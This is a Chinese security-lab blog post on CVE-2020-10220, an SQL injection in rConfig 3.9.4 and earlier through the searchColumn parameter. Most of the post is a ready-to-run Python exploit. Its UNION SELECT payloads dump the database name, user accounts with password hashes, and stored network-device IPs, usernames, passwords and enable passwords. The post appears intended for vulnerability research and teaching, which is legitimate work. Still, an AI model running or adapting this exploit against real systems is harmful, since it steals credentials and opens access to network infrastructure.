【初级】rconfig SQL注入

CVE-2020-10220
漏洞描述:此漏洞会影响未知部件文件 commands.inc.php的组件Web Interface。 手动调试的软件参数:searchColumn 该部分从属于:Parameter可导致 SQL注入
rConfig 3.9.4及之前版本中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
影响版本:rConfig 3.9.4及之前版本
EXP:

import requests
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

print ("rconfig 3.9 - SQL Injection PoC")
if len(sys.argv) != 2:
    print ("[+] Usage : ./rconfig_exploit.py https://target")
    exit()

vuln_page="/commands.inc.php"
vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command"
given_target = sys.argv[1]
target =  given_target
target += vuln_page
target += vuln_parameters

request = requests.session()
dashboard_request = request.get(target+vuln_page, allow_redirects=False, verify=False)


def extractDBinfos(myTarget=None,myPayload=None):
        """
        Extract information from database
        Args:
                - target+payload (String)
        Returns:
                - payload result (String)
        """
        result = ""
        encoded_request = myTarget+myPayload
        exploit_req = request.get(encoded_request)
        if '[PWN]' in str(exploit_req.content):
                result = str(exploit_req.content).split('[PWN]')[1]
        else:
                result="Maybe no more information ?"

        return result


if dashboard_request.status_code != 404:
        print ("[+] Triggering the payloads on "+given_target+vuln_page)
        # get the db name
        print ("[+] Extracting the current DB name :")
        db_payload = "%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)%20limit%200,1),NULL--"
        db_name = extractDBinfos(target,db_payload)
        print (db_name)
    # DB extract users
        print ("[+] Extracting 10 first users :")
        for i in range (0, 10):
            user1_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,username,0x3A,id,0x3A,password,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".users+limit+"+str(i)+","+str(i+1)+"),NULL--"
            user_h = extractDBinfos(target,user1_payload)
            #print ("[+] Dump device "+str(i))
            print (user_h)
    # DB extract devices information
        print ("[+] Extracting 10 first devices :")
        for i in range (0, 10):
            device_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".nodes+limit+"+str(i)+","+str(i+1)+"),NULL--"
            device_h = extractDBinfos(target,device_payload)
            #print ("[+] Dump device "+str(i))
            print (device_h)
    
        print ("Done")
                       
else:
    print ("[-] Please verify the URI")
    exit()

漏洞复现

图片[1]-【初级】rconfig SQL注入-NGC660 安全实验室
图片[2]-【初级】rconfig SQL注入-NGC660 安全实验室
© 版权声明
THE END
喜欢就支持一下吧
点赞13 分享